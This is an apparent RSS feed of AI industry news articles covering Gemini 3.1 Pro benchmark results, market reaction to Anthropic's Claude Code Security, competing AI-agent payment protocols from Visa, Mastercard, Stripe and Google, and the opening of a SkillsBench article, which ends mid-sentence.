Awesome Agents

Awesome Agentshttps://awesomeagents.ai/Your guide to AI models, agents, and the future of intelligenceen-usAwesome AgentsSat, 21 Feb 2026 19:56:34 +0100https://awesomeagents.ai/images/logo.pngAwesome Agentshttps://awesomeagents.ai/Google's Gemini 3.1 Pro Doubles Reasoning Performance and Retakes the AI Crownhttps://awesomeagents.ai/news/gemini-3-1-pro-doubles-reasoning/Sat, 21 Feb 2026 19:56:34 +0100https://awesomeagents.ai/news/gemini-3-1-pro-doubles-reasoning/<p>Google just shipped the most capable AI model in the world - and it did it with a point release.</p><p>Google just shipped the most capable AI model in the world - and it did it with a point release.</p> <p>Gemini 3.1 Pro, announced on February 19, scored 77.1% on the ARC-AGI-2 benchmark, more than doubling the 31.1% achieved by Gemini 3 Pro just three months ago. It tops Anthropic's Opus 4.6 and OpenAI's GPT-5.2 on 13 of 16 benchmarks Google evaluated. The price? Unchanged from the previous generation.</p> <p>This is not a new generation. It is a surgical reasoning upgrade that turns Google's Pro tier into the benchmark leader - and the first time Google has used a &quot;.1&quot; version increment, breaking its own release cadence.</p> <h2 id="the-numbers">The Numbers</h2> <div class="news-tldr"> <p><strong>Key Specs</strong></p> <table> <thead> <tr> <th>Spec</th> <th>Value</th> </tr> </thead> <tbody> <tr> <td>ARC-AGI-2</td> <td>77.1% (vs 31.1% for 3 Pro)</td> </tr> <tr> <td>Context Window</td> <td>1M tokens</td> </tr> <tr> <td>Output Limit</td> <td>64K tokens</td> </tr> <tr> <td>GPQA Diamond</td> <td>94.3%</td> </tr> <tr> <td>Input Pricing</td> <td>$2.00 / 1M tokens</td> </tr> <tr> <td>Output Pricing</td> <td>$12.00 / 1M tokens</td> </tr> </tbody> </table> </div> <p>The improvement on ARC-AGI-2 is the headline, but the gains are broad. Gemini 3.1 Pro leads on GPQA Diamond (94.3% vs Claude Opus 4.6's 91.3% and GPT-5.2's 92.4%), Terminal-Bench 2.0 (68.5%), LiveCodeBench Pro (2887 Elo), and SciCode (59%). These are not cherry-picked metrics - they span reasoning, coding, scientific knowledge, and agentic tasks.</p> <h3 id="the-full-benchmark-picture">The Full Benchmark Picture</h3> <table> <thead> <tr> <th>Benchmark</th> <th>Gemini 3.1 Pro</th> <th>Claude Opus 4.6</th> <th>GPT-5.2</th> </tr> </thead> <tbody> <tr> <td>ARC-AGI-2</td> <td><strong>77.1%</strong></td> <td>68.8%</td> <td>52.9%</td> </tr> <tr> <td>GPQA Diamond</td> <td><strong>94.3%</strong></td> <td>91.3%</td> <td>92.4%</td> </tr> <tr> <td>Humanity's Last Exam (no tools)</td> <td><strong>44.4%</strong></td> <td>42.1%</td> <td>-</td> </tr> <tr> <td>SWE-Bench Verified</td> <td>80.6%</td> <td><strong>82.0%</strong></td> <td>-</td> </tr> <tr> <td>Terminal-Bench 2.0</td> <td><strong>68.5%</strong></td> <td>-</td> <td>65.2%</td> </tr> <tr> <td>GDPval-AA Elo</td> <td>1317</td> <td>1606</td> <td>-</td> </tr> </tbody> </table> <p>The table tells the real story. Gemini 3.1 Pro dominates reasoning and scientific benchmarks, but Claude Opus 4.6 still holds ground on SWE-Bench Verified and expert-level evaluation tasks. OpenAI's GPT-5.3-Codex, meanwhile, leads on SWE-Bench Pro (56.8% vs 54.2%) and its own Terminal-Bench harness (77.3%).</p> <p>As we noted in our <a href="/leaderboards/overall-llm-rankings-feb-2026/">overall LLM rankings</a>, benchmark leadership has become a rotating crown. This release does not change that pattern - it accelerates it.</p> <h2 id="what-changed-under-the-hood">What Changed Under the Hood</h2> <h3 id="deep-think-goes-mainstream">Deep Think Goes Mainstream</h3> <p>Google credits the reasoning leap to &quot;upgraded core intelligence&quot; first introduced in Gemini 3 Deep Think, released just one week earlier on February 12. VentureBeat described 3.1 Pro as a &quot;Deep Think Mini&quot; - the same extended reasoning capability, packaged for the Pro tier with adjustable thinking depth.</p> <p>This is significant. Deep Think was a specialized model for hard problems. Gemini 3.1 Pro brings that reasoning to everyday use across the Gemini app, NotebookLM, Google AI Studio, Vertex AI, and even GitHub Copilot.</p> <h3 id="the-speed-trade-off">The Speed Trade-Off</h3> <p>Artificial Analysis ranks Gemini 3.1 Pro #1 in intelligence (score: 57 out of 116 models) but notes a cost. Time to first token averages 33.99 seconds - nearly 30x the median of 1.19 seconds for models in its price tier. Output speed is a respectable 104.7 tokens per second, but the initial thinking latency will frustrate developers building real-time applications.</p> <p>This is the classic reasoning-model tax. Extended thinking produces better answers but makes the model feel slow on first response. Developers choosing between Gemini 3.1 Pro and, say, <a href="/reviews/review-claude-sonnet-4-6/">Claude Sonnet 4.6</a> will need to decide whether raw intelligence or snappy interaction matters more for their use case.</p> <h3 id="developer-reception">Developer Reception</h3> <p>Vladislav Tankov, Director of AI at JetBrains, reported a 15% improvement in evaluation runs over the best Gemini 3 Pro previews, specifically highlighting token efficiency - fewer output tokens for mathematically reliable results.</p> <blockquote> <p>&quot;We're seeing up to a 15% improvement in evaluation runs compared to the best previews of the previous Gemini 3 Pro model,&quot; Tankov said, noting the model's improved token efficiency.</p></blockquote> <p>But independent testers have flagged friction. Some report latency spikes during high-demand periods, with rudimentary inputs occasionally taking over 100 seconds to process. More concerning: developers using Gemini CLI have documented instances of state degradation during long coding sessions, where the model inadvertently deleted functional code during file modifications.</p> <h2 id="availability-and-pricing">Availability and Pricing</h2> <p>Gemini 3.1 Pro is rolling out now in preview across:</p> <ul> <li><strong>Gemini app</strong> (Pro and Ultra plan users get higher limits)</li> <li><strong>NotebookLM</strong> (Pro and Ultra only)</li> <li><strong>Google AI Studio and Vertex AI</strong></li> <li><strong>Gemini CLI and Android Studio</strong></li> <li><strong>GitHub Copilot</strong> (public preview)</li> <li><strong>Microsoft Visual Studio and VS Code</strong></li> </ul> <p>Pricing holds at $2.00 per million input tokens and $12.00 per million output tokens for contexts under 200K tokens. Above 200K, rates rise to $4.00 and $18.00 respectively. This makes it roughly half the cost of <a href="/reviews/review-claude-opus-4-6/">Claude Opus 4.6</a> at comparable quality on most tasks - a pricing advantage Google will not let you forget.</p> <p>For a broader comparison of where Gemini fits in the current model landscape, see our <a href="/reviews/review-gemini-3-pro/">Gemini 3 Pro review</a> and <a href="/tools/chatgpt-vs-claude-vs-gemini/">ChatGPT vs Claude vs Gemini comparison</a>.</p> <h2 id="what-it-does-not-tell-you">What It Does Not Tell You</h2> <p>Google's benchmark table is impressive, but there are gaps worth noting.</p> <p>First, the ARC-AGI-2 score of 77.1% was achieved with the model's full extended reasoning mode. Google has not disclosed how long the model thinks per problem or the compute cost of that thinking. A model that takes 10 minutes per ARC puzzle is not the same as one that solves it in seconds.</p> <p>Second, the areas where Gemini 3.1 Pro trails are not trivial. Claude Opus 4.6 leads on GDPval-AA Elo (1606 vs 1317) - a measure of expert-level task quality that matters more for real-world professional use than abstract reasoning puzzles. Claude Sonnet 4.6 in Thinking Max mode scores even higher at 1633. If your workload is less &quot;solve novel logic puzzles&quot; and more &quot;produce expert-quality analysis,&quot; the benchmark crown may matter less than you think.</p> <p>Third, the 33-second time-to-first-token is a real constraint. For <a href="/tools/best-ai-coding-assistants-2026/">AI coding assistants</a> that need to feel responsive, or agent frameworks that chain multiple model calls, that latency compounds quickly. The <a href="/leaderboards/reasoning-benchmarks-leaderboard/">reasoning benchmarks leaderboard</a> captures raw capability, but latency-adjusted performance is a different ranking entirely.</p> <p>Finally, the model is in preview. Google says it is validating updates before general availability, particularly for &quot;ambitious agentic workflows.&quot; Preview means things can change - and in Google's history, they sometimes do.</p> <hr> <p>Gemini 3.1 Pro is the strongest reasoning model available today by most measures, at a price that undercuts the competition. Google broke its own release cadence to ship it, and the ARC-AGI-2 result is genuinely impressive. But the 33-second thinking penalty, the preview status, and Claude's persistent edge on expert-level tasks mean the AI crown remains contested. The best model depends on what you are building - and that is unlikely to change anytime soon.</p> <p><strong>Sources:</strong></p> <ul> <li><a href="https://blog.google/innovation-and-ai/models-and-research/gemini-models/gemini-3-1-pro/">Google Blog: Gemini 3.1 Pro Announcement</a></li> <li><a href="https://9to5google.com/2026/02/19/google-announces-gemini-3-1-pro-for-complex-problem-solving/">9to5Google: Google announces Gemini 3.1 Pro for complex problem-solving</a></li> <li><a href="https://www.theregister.com/2026/02/19/google_germinates_gemini_31_pro/">The Register: Google germinates Gemini 3.1 Pro in ongoing AI model race</a></li> <li><a href="https://techcrunch.com/2026/02/19/googles-new-gemini-pro-model-has-record-benchmark-scores-again/">TechCrunch: Google's new Gemini Pro model has record benchmark scores - again</a></li> <li><a href="https://www.trendingtopics.eu/gemini-3-1-pro-leads-most-benchmarks-but-trails-claude-opus-4-6-in-some-tasks/">Trending Topics: Gemini 3.1 Pro Leads Most Benchmarks But Trails Claude Opus 4.6 in Some Tasks</a></li> <li><a href="https://artificialanalysis.ai/models/gemini-3-1-pro-preview">Artificial Analysis: Gemini 3.1 Pro Preview</a></li> <li><a href="https://github.blog/changelog/2026-02-19-gemini-3-1-pro-is-now-in-public-preview-in-github-copilot/">GitHub Blog: Gemini 3.1 Pro in GitHub Copilot</a></li> </ul>Elena MarchettiNewsAnthropic's Claude Code Security Wipes Billions Off Cybersecurity Stocks in a Single Afternoonhttps://awesomeagents.ai/news/claude-code-security-cybersecurity-stocks-crash/Sat, 21 Feb 2026 16:28:00 +0100https://awesomeagents.ai/news/claude-code-security-cybersecurity-stocks-crash/<div class="news-tldr"> <p><strong>TL;DR</strong></p> <ul> <li>Anthropic launched Claude Code Security in limited research preview on February 20 - an AI vulnerability scanner built into Claude Code that reasons about codebases like a human security researcher</li> <li>Using Claude Opus 4.6, Anthropic's Frontier Red Team found over 500 vulnerabilities in production open-source projects, some undetected for decades despite expert review</li> <li>JFrog stock plunged 25% in a single session, CrowdStrike fell 8%, Okta dropped 8%, SailPoint lost 9.4%, and the Global X Cybersecurity ETF (BUG) hit its lowest since November 2023</li> <li>Barclays analysts called the selloff &quot;illogical,&quot; arguing Claude Code Security does not directly compete with the companies investors punished</li> <li>OpenAI launched a competing tool called Aardvark four months earlier - two of three major foundation model providers now treat code security as a built-in feature</li> </ul> </div> <p>One tweet from Anthropic. One limited research preview. Billions wiped off the cybersecurity sector in an afternoon.</p><div class="news-tldr"> <p><strong>TL;DR</strong></p> <ul> <li>Anthropic launched Claude Code Security in limited research preview on February 20 - an AI vulnerability scanner built into Claude Code that reasons about codebases like a human security researcher</li> <li>Using Claude Opus 4.6, Anthropic's Frontier Red Team found over 500 vulnerabilities in production open-source projects, some undetected for decades despite expert review</li> <li>JFrog stock plunged 25% in a single session, CrowdStrike fell 8%, Okta dropped 8%, SailPoint lost 9.4%, and the Global X Cybersecurity ETF (BUG) hit its lowest since November 2023</li> <li>Barclays analysts called the selloff &quot;illogical,&quot; arguing Claude Code Security does not directly compete with the companies investors punished</li> <li>OpenAI launched a competing tool called Aardvark four months earlier - two of three major foundation model providers now treat code security as a built-in feature</li> </ul> </div> <p>One tweet from Anthropic. One limited research preview. Billions wiped off the cybersecurity sector in an afternoon.</p> <p>On February 20, Anthropic <a href="https://anthropic.com/news/claude-code-security">announced Claude Code Security</a> - a new capability built into Claude Code that scans codebases for vulnerabilities and suggests targeted patches for human review. The tool is available to Enterprise and Team customers, with expedited free access for open-source maintainers.</p> <p>The market response was immediate and violent. <a href="https://finance.yahoo.com/news/why-jfrog-frog-stock-falling-211144571.html">JFrog lost 25% of its value</a> in a single trading session. CrowdStrike dropped 8%. Cloudflare fell 8.1%. SailPoint shed 9.4%. GitLab lost 8%. The <a href="https://www.benzinga.com/markets/tech/26/02/50768056/why-anthropics-new-ai-tool-claude-code-security-is-rattling-cybersecurity-stocks">Global X Cybersecurity ETF (BUG)</a> closed at its lowest level since November 2023.</p> <p>All from a tool that is not even generally available yet.</p> <h2 id="what-claude-code-security-actually-does">What Claude Code Security Actually Does</h2> <p>Traditional static analysis tools work by pattern-matching against known exploit signatures. They catch common issues - SQL injection, XSS, buffer overflows - but struggle with anything that requires understanding how components interact across a codebase.</p> <p>Claude Code Security takes a different approach. According to Anthropic, it &quot;reads and reasons about your code the way a human security researcher would: understanding how components interact, tracing how data moves through your application.&quot; It catches business logic flaws, broken access control, authentication bypasses, and input validation gaps that rule-based scanners miss.</p> <p>Every finding goes through multi-stage verification. Claude attempts to prove or disprove its own results to filter false positives. Findings receive severity ratings and confidence scores before reaching analysts. Nothing is applied without human approval.</p> <p>Logan Graham, who leads Anthropic's Frontier Red Team, characterized the capability as &quot;comparable to junior security researchers but at significantly faster speeds.&quot;</p> <h2 id="500-vulnerabilities-that-experts-missed-for-decades">500 Vulnerabilities That Experts Missed for Decades</h2> <p>The headline number that spooked the market: using Claude Opus 4.6, Anthropic's team discovered over 500 vulnerabilities in production open-source codebases. These are projects with active maintainers, years of expert review, and millions of users. Some of the bugs had sat undetected for decades.</p> <p>This is what separates Claude Code Security from existing tools. It is not finding known vulnerability patterns faster. It is finding vulnerability classes that traditional scanners were architecturally incapable of detecting - logic flaws that require reasoning about how data flows across multiple components.</p> <p>For security teams, that is exciting. For investors in companies whose entire business model is selling vulnerability detection, it is terrifying.</p> <h2 id="the-market-carnage">The Market Carnage</h2> <p>Here is what happened to cybersecurity stocks on February 20:</p> <table> <thead> <tr> <th>Company</th> <th>Ticker</th> <th>Drop</th> </tr> </thead> <tbody> <tr> <td>JFrog</td> <td>FROG</td> <td>-25.0%</td> </tr> <tr> <td>SailPoint</td> <td>SAIL</td> <td>-9.4%</td> </tr> <tr> <td>Okta</td> <td>OKTA</td> <td>-8.0%</td> </tr> <tr> <td>CrowdStrike</td> <td>CRWD</td> <td>-8.0%</td> </tr> <tr> <td>Cloudflare</td> <td>NET</td> <td>-8.1%</td> </tr> <tr> <td>GitLab</td> <td>GTLB</td> <td>-8.0%</td> </tr> <tr> <td>Zscaler</td> <td>ZS</td> <td>-5.5%</td> </tr> <tr> <td>Palo Alto Networks</td> <td>PANW</td> <td>-1.5%</td> </tr> <tr> <td>Global X Cyber ETF</td> <td>BUG</td> <td>-5.0%</td> </tr> </tbody> </table> <p>JFrog was hit hardest because its core business - software supply chain curation and package-level security controls - sits directly in Claude Code Security's crosshairs. Raymond James analyst Mark Cash explained that enterprises &quot;may perceive reduced need for downstream package-level controls&quot; if code quality improves at the generation stage. If the AI catches the bug before it enters the supply chain, why pay for downstream filtering?</p> <h2 id="the-illogical-selloff">The &quot;Illogical&quot; Selloff</h2> <p>Not everyone agrees the panic was warranted. <a href="https://www.investing.com/news/stock-market-news/why-the-jfrog-frog-selloff-is-excessive-according-to-raymond-james-4517439">Barclays analysts</a> pushed back hard, calling the selloff &quot;illogical&quot; and arguing that Claude Code Security does not directly compete with most of the companies that got hammered.</p> <p>They have a point. CrowdStrike sells endpoint protection and threat detection. Okta sells identity management. Palo Alto Networks sells network security. None of these are vulnerability scanners. The market treated &quot;AI can find bugs in code&quot; as &quot;AI will replace all cybersecurity products,&quot; which is a massive logical leap.</p> <p>The more accurate read: Claude Code Security threatens a specific slice of the market - static application security testing (SAST), software composition analysis (SCA), and developer security tooling. Companies like JFrog, Snyk, and parts of GitLab's security suite sit in the direct blast radius. CrowdStrike and Palo Alto do not.</p> <p>But markets run on sentiment, and the sentiment was: AI just came for cybersecurity.</p> <h2 id="the-competitive-landscape">The Competitive Landscape</h2> <p>Anthropic is not alone. OpenAI launched <a href="https://siliconangle.com/2026/02/20/cybersecurity-stocks-drop-anthropic-debuts-claude-code-security/">Aardvark</a> roughly four months earlier - a competing tool that scans for vulnerabilities and tests them in isolated sandboxes. Two of three major foundation model providers now treat code security as a built-in model capability rather than something you buy separately.</p> <p>This is the pattern that terrifies enterprise software investors: when a capability becomes a feature of the platform layer rather than a standalone product. It happened with databases (every cloud has one built in), monitoring (every cloud has one built in), and now it is happening with code security.</p> <p>Jefferies analyst Joseph Gallo warned that model providers &quot;will announce more products and compete for incremental cyber budget dollars.&quot; The question is not whether AI will transform security tooling. The question is how much of the existing security stack gets absorbed into the model layer versus remaining as a separate product.</p> <h2 id="what-this-means">What This Means</h2> <p><strong>For security teams:</strong> Claude Code Security in its current form is a force multiplier, not a replacement. It finds bugs that your existing tools miss, but it operates at the code level. You still need endpoint protection, identity management, network security, and incident response. The &quot;junior security researcher at machine speed&quot; framing is accurate - useful, but not the full team.</p> <p><strong>For developers:</strong> If you maintain open-source projects, apply for the <a href="https://claude.com/contact-sales/security">expedited access program</a>. Free vulnerability scanning from a tool that found 500 bugs in projects maintained by experts is a genuine public good.</p> <p><strong>For investors:</strong> The market is pricing in disruption that has not happened yet for companies that are not directly affected. The selloff in CrowdStrike and Palo Alto looks like collateral damage from a sector-wide panic. The JFrog decline, while painful, reflects a more legitimate competitive concern.</p> <p><strong>For the AI industry:</strong> This is the second time in a month that an Anthropic product announcement has moved markets (the first was Claude Cowork plugins in January). When a research preview - not even a GA product - can wipe billions off a sector, it signals how much the market believes AI is about to restructure enterprise software.</p> <p>One announcement. One limited preview. Billions in market cap. The cybersecurity industry just got a preview of what AI disruption looks like - and the tool that triggered it is not even finished yet.</p>Elena MarchettiNewsVisa, Mastercard, Stripe, and Google Are Racing to Give AI Agents Your Credit Cardhttps://awesomeagents.ai/news/payment-giants-agentic-commerce-race/Sat, 21 Feb 2026 15:58:51 +0100https://awesomeagents.ai/news/payment-giants-agentic-commerce-race/<p>The biggest financial infrastructure war of the decade is not about who has the best model. It is about who gets to process the transaction when your AI agent buys something without asking you first.</p><p>The biggest financial infrastructure war of the decade is not about who has the best model. It is about who gets to process the transaction when your AI agent buys something without asking you first.</p> <p>In the past four months, Visa, Mastercard, Stripe (alongside OpenAI), and Google have each launched competing protocols designed to let <a href="/guides/what-are-ai-agents/">AI agents</a> initiate, authorize, and complete purchases on behalf of humans. Real money has already changed hands. DBS Bank in Singapore ran the first authenticated agent-initiated food purchases in Asia Pacific. Mastercard processed its first agentic transaction on-network last quarter. OpenAI's ChatGPT now lets users buy from Etsy sellers without leaving the chat.</p> <p>McKinsey projects this market at $3 trillion to $5 trillion globally by 2030. The question is not whether AI agents will spend your money. It is which company controls the rails.</p> <h2 id="the-four-protocols">The Four Protocols</h2> <table> <thead> <tr> <th></th> <th><strong>Visa (VIC)</strong></th> <th><strong>Mastercard (Agent Pay)</strong></th> <th><strong>Stripe/OpenAI (ACP)</strong></th> <th><strong>Google (AP2)</strong></th> </tr> </thead> <tbody> <tr> <td><strong>Protocol</strong></td> <td>Trusted Agent Protocol</td> <td>Agentic Tokens</td> <td>Agentic Commerce Protocol</td> <td>Agent Payments Protocol</td> </tr> <tr> <td><strong>Security model</strong></td> <td>Cryptographic identity via Web Bot Auth</td> <td>Dynamic digital credentials</td> <td>Shared Payment Tokens (single-use)</td> <td>Mandates (cryptographically-signed contracts)</td> </tr> <tr> <td><strong>Key partners</strong></td> <td>Microsoft, Shopify, Worldpay, DBS</td> <td>Microsoft, Google, PayPal, Citi, US Bank</td> <td>Salesforce, Squarespace, BigCommerce, Etsy</td> <td>Mastercard, PayPal, AmEx, Coinbase, Shopify</td> </tr> <tr> <td><strong>Live transactions</strong></td> <td>Hundreds completed (Dec 2025)</td> <td>First on-network transaction (Q3 2025)</td> <td>Instant Checkout in ChatGPT (live)</td> <td>Protocol announced Sep 2025, pilots ongoing</td> </tr> <tr> <td><strong>Merchant reach</strong></td> <td>100+ partners, 30+ in sandbox</td> <td>Rolled out to all US cardholders (Nov 2025)</td> <td>Stripe-connected merchants only</td> <td>Payment-agnostic (cards, banks, crypto)</td> </tr> <tr> <td><strong>2026 target</strong></td> <td>Millions of users by holiday season</td> <td>Agent Suite launching Q2 2026</td> <td>1M+ Shopify merchants coming soon</td> <td>Open standard via Linux Foundation</td> </tr> </tbody> </table> <p>The approaches split into two camps. Visa and Mastercard are extending their existing card networks, adding identity and authorization layers on top of infrastructure that already processes trillions in annual volume. Stripe and Google are building new protocols from scratch, betting that the agentic economy needs purpose-built rails rather than retrofitted ones.</p> <h3 id="visa-the-incumbent-play">Visa: The incumbent play</h3> <p>Visa Intelligent Commerce wraps agent identity verification around existing payment flows. The Trusted Agent Protocol adds what amounts to a digital passport for AI bots, letting merchants verify that the agent making a purchase is authorized by the cardholder's bank. Over 100 partners are onboarded globally, with 20-plus agent platforms integrating directly. Pilots in Asia Pacific, Europe, and Latin America launched in early 2026.</p> <p>Visa's advantage is reach. It already sits between virtually every consumer and every merchant. The bet is that merchants will not adopt a new protocol when they can add agent support to the Visa integration they already have.</p> <h3 id="mastercard-move-fast-partner-widely">Mastercard: Move fast, partner widely</h3> <p>Mastercard's Agent Pay uses Agentic Tokens, dynamic credentials that change per transaction and carry embedded spending rules. The system rolled out to all US cardholders by November 2025, with Citi and US Bank among the first issuers enabled. In February 2026, Mastercard completed Australia's first authenticated agentic transactions.</p> <blockquote> <p>&quot;The train is leaving the station, and we're right in the front of it,&quot; Mastercard CEO Michael Miebach said during the company's earnings call. &quot;Only when there is trust will this whole space actually evolve.&quot;</p></blockquote> <p>Mastercard is also hedging its bets by participating in Google's protocol and OpenAI's protocol simultaneously, ensuring it sits at the intersection of whatever standard wins.</p> <h3 id="stripe-and-openai-the-developer-bet">Stripe and OpenAI: The developer bet</h3> <p>The Agentic Commerce Protocol is an open-source specification co-developed by Stripe and OpenAI. It introduces Shared Payment Tokens for single-transaction authorization and can be implemented as either a REST API or an MCP server. The protocol already powers Instant Checkout inside ChatGPT, where US users can buy from Etsy and soon from over a million Shopify merchants.</p> <p>The Stripe approach is pragmatic. It packages the new protocol with Stripe's existing merchant infrastructure, meaning any Stripe-connected business can add agentic commerce support with minimal integration work. The limitation is exactly that: it only works with Stripe-connected merchants.</p> <p>Major retailers are already onboard. URBN (Anthropologie, Free People, Urban Outfitters), Coach, Kate Spade, Revolve, and Ashley Furniture have joined the Agentic Commerce Suite. At NRF 2026 in January, 75% of attendees reported they were either implementing or actively planning agentic commerce initiatives.</p> <h3 id="google-the-open-standard-gambit">Google: The open-standard gambit</h3> <p>Google's Agent Payments Protocol launched with over 60 supporting companies, and the underlying A2A Protocol has been donated to the Linux Foundation with 150-plus organizational backers. AP2 uses &quot;mandates,&quot; cryptographically-signed digital contracts that serve as verifiable proof of a user's instructions.</p> <p>The protocol is deliberately payment-agnostic. It works with credit cards, debit cards, real-time bank transfers, and cryptocurrencies. Google also launched the Universal Commerce Protocol at NRF 2026 in partnership with Shopify, Etsy, Wayfair, Target, and Walmart, establishing standardized interfaces for AI agents to discover products across retail platforms.</p> <h2 id="counter-argument">Counter-Argument</h2> <p>The industry excitement is running well ahead of consumer readiness.</p> <p>Only 24% of US consumers say they would be comfortable letting an AI agent make a purchase today. While 52% are willing to share data with AI shopping agents, 83% express concerns about privacy, data misuse, and unwanted marketing. That is an extraordinary trust gap for an industry projecting trillions in volume within four years.</p> <p>There is also a fraud problem that nobody has solved. AI agents transacting at odd hours, across geographies, with rapid repeated purchases look exactly like fraud bots to existing detection systems. Visa's own threat analysis acknowledges that fraudsters are already manipulating agentic shopping results to steer consumers toward scam merchants, and that AI shopping agents can be deceived by &quot;sophisticated counterfeit merchants engineered specifically to exploit them.&quot;</p> <p>The security architecture is being built in real time, which means the first wave of <a href="/news/anthropic-agent-autonomy-study/">autonomous agents</a> spending real money will be operating on infrastructure that has not been stress-tested at scale. When Mastercard's Miebach says trust is the prerequisite, he is also describing the industry's biggest unsolved problem.</p> <h3 id="the-protocol-fragmentation-risk">The protocol fragmentation risk</h3> <p>Four competing protocols from four of the world's most powerful technology companies is not interoperability. It is a standards war. Merchants who integrate with Visa's VIC gain no compatibility with Stripe's ACP. A retailer supporting Google's AP2 still needs separate work for Mastercard's Agent Pay. The Universal Commerce Protocol endorsed by Google is also endorsed by Visa, Mastercard, and Stripe, but UCP handles product discovery, not payment authorization, which is where the real competition lies.</p> <p>The historical pattern is clear. Standards wars in payments, as we saw with NFC, mobile wallets, and QR codes, take years to consolidate. Meanwhile, merchants pay integration costs for every protocol they support, and those costs get passed to consumers.</p> <h2 id="what-the-market-is-missing">What the Market Is Missing</h2> <p>Every company in this race is framing agentic commerce as a consumer convenience story. AI agents will save you time. They will find better deals. They will handle the tedious parts of shopping so you do not have to.</p> <p>But follow the money. Visa and Mastercard charge interchange fees on every transaction. Stripe takes a percentage of every payment it processes. Google's commerce protocols funnel purchasing through surfaces where it <a href="/news/ai-chatbot-advertising-war/">sells advertising</a>. OpenAI's Instant Checkout is a monetization channel for a company that just launched ads in ChatGPT and projects $1 billion in free-user revenue this year.</p> <p>The entity that controls how AI agents pay is not just processing transactions. It is capturing the most valuable data stream in commerce: real-time purchase intent, derived from the full context of a conversation between a human and an AI. That is worth more than interchange. It is worth more than advertising. It is the complete picture of what you want, when you want it, and how much you are willing to pay, delivered in a format that machines can act on instantly.</p> <p>McKinsey's $5 trillion figure is not a projection of consumer savings. It is a projection of orchestrated revenue, money that flows through systems controlled by a handful of companies that have positioned themselves between every buyer and every seller. The question is not whether agentic commerce will arrive. It is whether anyone is building the infrastructure to ensure it works for the people spending the money, and not just the companies moving it.</p> <hr> <p><strong>Sources:</strong></p> <ul> <li><a href="https://www.useproxy.ai/blog/ai-agent-payments-landscape-2026">The AI Agent Payments Landscape in 2026</a> - Proxy</li> <li><a href="https://usa.visa.com/about-visa/newsroom/press-releases.releaseId.21961.html">Visa and Partners Complete Secure AI Transactions</a> - Visa</li> <li><a href="https://www.mastercard.com/news/ap/en/newsroom/press-releases/en/2026/mastercard-accelerates-ai-powered-commerce-with-australia-s-first-authenticated-agentic-transactions-using-agent-pay/">Mastercard accelerates AI-powered commerce with Australia's first authenticated agentic transactions</a> - Mastercard</li> <li><a href="https://stripe.com/newsroom/news/stripe-openai-instant-checkout">Stripe powers Instant Checkout in ChatGPT and releases Agentic Commerce Protocol</a> - Stripe</li> <li><a href="https://cloud.google.com/blog/products/ai-machine-learning/announcing-agents-to-payments-ap2-protocol">Announcing Agent Payments Protocol (AP2)</a> - Google Cloud</li> <li><a href="https://www.dbs.com/newsroom/DBS_is_first_bank_in_Asia_Pacific_to_pilot_Visa_Intelligent_Commerce_for_everyday_payments">DBS is first bank in Asia Pacific to pilot Visa Intelligent Commerce</a> - DBS</li> <li><a href="https://www.mckinsey.com/capabilities/quantumblack/our-insights/the-agentic-commerce-opportunity-how-ai-agents-are-ushering-in-a-new-era-for-consumers-and-merchants">McKinsey: The agentic commerce opportunity</a> - McKinsey</li> <li><a href="https://stripe.com/blog/three-agentic-commerce-trends-nrf-2026">The three biggest agentic commerce trends from NRF 2026</a> - Stripe</li> <li><a href="https://www.paymentsdive.com/news/visa-mastercard-race-agentic-ai-commerce-payments/750428/">Visa, Mastercard race to agentic AI commerce</a> - Payments Dive</li> <li><a href="https://www.pymnts.com/earnings/2026/mastercard-leans-into-agentic-commerce-stablecoins-while-card-volumes-rise/">Mastercard Leans Into Agentic Commerce and Stablecoins</a> - PYMNTS</li> </ul>Daniel OkaforNewsSkillsBench Shows a $1 Model With Expert Guides Beats a $15 Model Without Themhttps://awesomeagents.ai/news/skillsbench-small-models-beat-frontier-with-expert-skills/Sat, 21 Feb 2026 15:45:00 +0100https://awesomeagents.ai/news/skillsbench-small-models-beat-frontier-with-expert-skills/<div class="news-tldr"> <p><strong>TL;DR</strong></p> <ul> <li>SkillsBench tests 7 AI agent configurations on 84 practical tasks across 11 domains - healthcare, cybersecurity, finance, manufacturing, and more</li> <li>Human-curated &quot;skills&quot; (step-by-step markdown guides) boost pass rates by 16.2 percentage points on average</li> <li>Claude Haiku 4.5 with skills (27.7%) outperforms the far more expensive Claude Opus 4.5 without them (22.0%)</li> <li>Self-generated skills backfire: models that write their own guides average -1.3 pp versus baseline - they cannot teach themselves</li> <li>Gemini CLI with Gemini 3 Flash leads the leaderboard at 48.7% with skills; healthcare saw the biggest uplift at +51.9 pp</li> <li>The team also released OpenThoughts-TBLite, a faster coding benchmark designed for smaller models</li> </ul> </div> <p>There is a recurring assumption in AI: bigger models solve harder problems. Throw more parameters, more compute, more money at the problem, and performance goes up. <a href="https://www.skillsbench.ai/">SkillsBench</a>, a new benchmark from <a href="https://github.com/benchflow-ai/skillsbench">BenchFlow</a> with contributions from 105 researchers across academia and industry, just put hard numbers behind why that assumption is wrong - or at least incomplete.</p><div class="news-tldr"> <p><strong>TL;DR</strong></p> <ul> <li>SkillsBench tests 7 AI agent configurations on 84 practical tasks across 11 domains - healthcare, cybersecurity, finance, manufacturing, and more</li> <li>Human-curated &quot;skills&quot; (step-by-step markdown guides) boost pass rates by 16.2 percentage points on average</li> <li>Claude Haiku 4.5 with skills (27.7%) outperforms the far more expensive Claude Opus 4.5 without them (22.0%)</li> <li>Self-generated skills backfire: models that write their own guides average -1.3 pp versus baseline - they cannot teach themselves</li> <li>Gemini CLI with Gemini 3 Flash leads the leaderboard at 48.7% with skills; healthcare saw the biggest uplift at +51.9 pp</li> <li>The team also released OpenThoughts-TBLite, a faster coding benchmark designed for smaller models</li> </ul> </div> <p>There is a recurring assumption in AI: bigger models solve harder problems. Throw more parameters, more compute, more money at the problem, and performance goes up. <a href="https://www.skillsbench.ai/">SkillsBench</a>, a new benchmark from <a href="https://github.com/benchflow-ai/skillsbench">BenchFlow</a> with contributions from 105 researchers across academia and industry, just put hard numbers behind why that assumption is wrong - or at least incomplete.</p> <p>The <a href="https://arxiv.org/abs/2602.12670">paper</a> presents a simple experiment: take 84 real-world tasks across 11 professional domains, test 7 frontier AI agent configurations under three conditions (no guidance, human-written skills, and self-generated skills), run 7,308 trials with deterministic verification, and measure what actually moves the needle.</p> <p>The answer is not model size. It is the quality of the instructions you give the model.</p> <h2 id="what-are-skills">What Are Skills?</h2> <p>In SkillsBench's framework, a &quot;skill&quot; is a structured package - a <code>SKILL.md</code> markdown file plus optional code templates, reference resources, and verification logic - that encodes procedural knowledge: standard operating procedures, domain conventions, and task-specific heuristics.</p> <p>Think of it as the difference between 